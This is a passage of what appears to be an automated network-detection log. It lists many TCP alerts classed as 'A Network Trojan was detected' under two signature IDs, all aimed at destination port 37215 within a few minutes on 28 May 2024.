            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918323
            SID:2835222
            Source Port:39942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555206
            SID:2835222
            Source Port:46476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784124
            SID:2835222
            Source Port:35898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251046
            SID:2835222
            Source Port:55396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326879
            SID:2835222
            Source Port:38638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778501
            SID:2829579
            Source Port:42558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841067
            SID:2835222
            Source Port:48736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848912
            SID:2829579
            Source Port:52106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024650
            SID:2835222
            Source Port:39812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777926
            SID:2829579
            Source Port:40640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.623424
            SID:2835222
            Source Port:39758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910936
            SID:2829579
            Source Port:50470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737259
            SID:2829579
            Source Port:37818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.857936
            SID:2829579
            Source Port:57548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873588
            SID:2835222
            Source Port:39932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867660
            SID:2835222
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508290
            SID:2835222
            Source Port:58938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561068
            SID:2829579
            Source Port:48846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556976
            SID:2829579
            Source Port:50510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284359
            SID:2829579
            Source Port:34630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507765
            SID:2835222
            Source Port:42534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842718
            SID:2835222
            Source Port:48234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046913
            SID:2835222
            Source Port:60302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584886
            SID:2829579
            Source Port:38978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056875
            SID:2835222
            Source Port:51330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676720
            SID:2835222
            Source Port:47320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470269
            SID:2829579
            Source Port:53984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717157
            SID:2835222
            Source Port:47928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190276
            SID:2829579
            Source Port:50648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855497
            SID:2835222
            Source Port:33170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864655
            SID:2829579
            Source Port:39268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026529
            SID:2835222
            Source Port:53350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954601
            SID:2835222
            Source Port:49902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336033
            SID:2829579
            Source Port:48796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931991
            SID:2835222
            Source Port:59144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990552
            SID:2835222
            Source Port:37916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869643
            SID:2829579
            Source Port:47954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952593
            SID:2829579
            Source Port:36750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760098
            SID:2835222
            Source Port:36996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277489
            SID:2835222
            Source Port:56486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741920
            SID:2835222
            Source Port:49556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901421
            SID:2829579
            Source Port:52506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476797
            SID:2829579
            Source Port:39134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863162
            SID:2835222
            Source Port:33174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869988
            SID:2835222
            Source Port:33774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334104
            SID:2829579
            Source Port:59468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313900
            SID:2835222
            Source Port:56548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320715
            SID:2829579
            Source Port:44444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.878800
            SID:2829579
            Source Port:44302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840970
            SID:2835222
            Source Port:47840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871157
            SID:2835222
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334941
            SID:2835222
            Source Port:57894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.238122
            SID:2835222
            Source Port:57560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.580886
            SID:2829579
            Source Port:43806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855613
            SID:2829579
            Source Port:34738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961438
            SID:2835222
            Source Port:55034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812036
            SID:2829579
            Source Port:42046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909850
            SID:2835222
            Source Port:51160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681803
            SID:2829579
            Source Port:45354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.793997
            SID:2829579
            Source Port:39974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843616
            SID:2835222
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.011183
            SID:2835222
            Source Port:45740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922378
            SID:2829579
            Source Port:46060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998179
            SID:2829579
            Source Port:46820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597062
            SID:2835222
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955629
            SID:2829579
            Source Port:42038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985421
            SID:2829579
            Source Port:34110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908948
            SID:2829579
            Source Port:56692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064131
            SID:2835222
            Source Port:42962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274764
            SID:2829579
            Source Port:58254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048209
            SID:2835222
            Source Port:45052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273409
            SID:2829579
            Source Port:56392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779115
            SID:2835222
            Source Port:33278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.983912
            SID:2835222
            Source Port:35574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309389
            SID:2829579
            Source Port:36046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320542
            SID:2835222
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738625
            SID:2835222
            Source Port:34212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862869
            SID:2835222
            Source Port:55146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335299
            SID:2829579
            Source Port:34156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735578
            SID:2829579
            Source Port:33512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.042951
            SID:2829579
            Source Port:48182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059052
            SID:2835222
            Source Port:56738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387950
            SID:2829579
            Source Port:35856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760190
            SID:2835222
            Source Port:42224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000912
            SID:2835222
            Source Port:49710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.914336
            SID:2829579
            Source Port:36350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852250
            SID:2835222
            Source Port:45458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326285
            SID:2835222
            Source Port:36248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834520
            SID:2835222
            Source Port:59366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880912
            SID:2829579
            Source Port:39952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788840
            SID:2829579
            Source Port:57264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314087
            SID:2835222
            Source Port:55238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.431319
            SID:2835222
            Source Port:36226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031455
            SID:2835222
            Source Port:38746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910099
            SID:2835222
            Source Port:45272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885515
            SID:2829579
            Source Port:57202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350125
            SID:2835222
            Source Port:55846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717563
            SID:2835222
            Source Port:54040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811528
            SID:2835222
            Source Port:51550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260446
            SID:2835222
            Source Port:43250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597040
            SID:2829579
            Source Port:40842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.988549
            SID:2835222
            Source Port:38660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879725
            SID:2829579
            Source Port:53072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063381
            SID:2835222
            Source Port:45478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040211
            SID:2829579
            Source Port:45948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537175
            SID:2835222
            Source Port:42416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808211
            SID:2835222
            Source Port:54974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824284
            SID:2835222
            Source Port:39242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027142
            SID:2835222
            Source Port:35046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956209
            SID:2835222
            Source Port:53650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.997596
            SID:2829579
            Source Port:59522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996128
            SID:2829579
            Source Port:40058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047814
            SID:2829579
            Source Port:40732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.030278
            SID:2835222
            Source Port:44524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989473
            SID:2829579
            Source Port:52042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986013
            SID:2829579
            Source Port:56430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743654
            SID:2829579
            Source Port:45160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061508
            SID:2835222
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986589
            SID:2835222
            Source Port:57912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935173
            SID:2829579
            Source Port:59954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.397424
            SID:2835222
            Source Port:56774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.077966
            SID:2835222
            Source Port:58606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675789
            SID:2835222
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862035
            SID:2829579
            Source Port:53088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291213
            SID:2835222
            Source Port:48192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.753259
            SID:2829579
            Source Port:60824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919011
            SID:2829579
            Source Port:43920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804350
            SID:2835222
            Source Port:33934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932662
            SID:2829579
            Source Port:36610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914565
            SID:2829579
            Source Port:41632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860643
            SID:2829579
            Source Port:49122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883696
            SID:2835222
            Source Port:43620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814270
            SID:2835222
            Source Port:52052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559244
            SID:2835222
            Source Port:36136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922317
            SID:2835222
            Source Port:56338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681339
            SID:2835222
            Source Port:39998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816714
            SID:2835222
            Source Port:60864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058478
            SID:2835222
            Source Port:35548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810489
            SID:2829579
            Source Port:41264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251181
            SID:2835222
            Source Port:42048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.842496
            SID:2829579
            Source Port:42022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810875
            SID:2829579
            Source Port:34106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322953
            SID:2835222
            Source Port:55170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879969
            SID:2829579
            Source Port:60804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999718
            SID:2829579
            Source Port:34076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.746622
            SID:2829579
            Source Port:58502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910895
            SID:2829579
            Source Port:35966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953018
            SID:2829579
            Source Port:59168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739544
            SID:2835222
            Source Port:54128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807095
            SID:2829579
            Source Port:43816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.662197
            SID:2835222
            Source Port:44142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.884608
            SID:2829579
            Source Port:55158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046550
            SID:2829579
            Source Port:34160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041913
            SID:2835222
            Source Port:35034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655239
            SID:2829579
            Source Port:54814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816868
            SID:2835222
            Source Port:53922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777073
            SID:2835222
            Source Port:40188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999023
            SID:2829579
            Source Port:50068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014451
            SID:2835222
            Source Port:59568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067555
            SID:2829579
            Source Port:43134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996242
            SID:2829579
            Source Port:44322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377072
            SID:2835222
            Source Port:59336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180856
            SID:2829579
            Source Port:33886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568241
            SID:2835222
            Source Port:50250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.170103
            SID:2835222
            Source Port:42996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713875
            SID:2829579
            Source Port:33866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873607
            SID:2835222
            Source Port:34972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020088
            SID:2829579
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398141
            SID:2829579
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772763
            SID:2829579
            Source Port:43986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995892
            SID:2835222
            Source Port:40210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.059101
            SID:2835222
            Source Port:47244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381884
            SID:2835222
            Source Port:58438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.413900
            SID:2829579
            Source Port:52904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938899
            SID:2835222
            Source Port:36218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336489
            SID:2835222
            Source Port:45568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934077
            SID:2835222
            Source Port:57736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434486
            SID:2829579
            Source Port:42594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639382
            SID:2829579
            Source Port:52122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895345
            SID:2835222
            Source Port:45462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459615
            SID:2829579
            Source Port:57258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.019083
            SID:2835222
            Source Port:40720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.017417
            SID:2835222
            Source Port:56474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376840
            SID:2829579
            Source Port:58562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327542
            SID:2835222
            Source Port:42016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714475
            SID:2835222
            Source Port:54248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707037
            SID:2829579
            Source Port:59736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.773536
            SID:2829579
            Source Port:34208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790431
            SID:2829579
            Source Port:51742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.886639
            SID:2829579
            Source Port:38784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911926
            SID:2835222
            Source Port:57498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760383
            SID:2829579
            Source Port:49306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867905
            SID:2835222
            Source Port:36298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321641
            SID:2829579
            Source Port:38760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381416
            SID:2835222
            Source Port:46394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051283
            SID:2829579
            Source Port:52592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872285
            SID:2835222
            Source Port:38872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
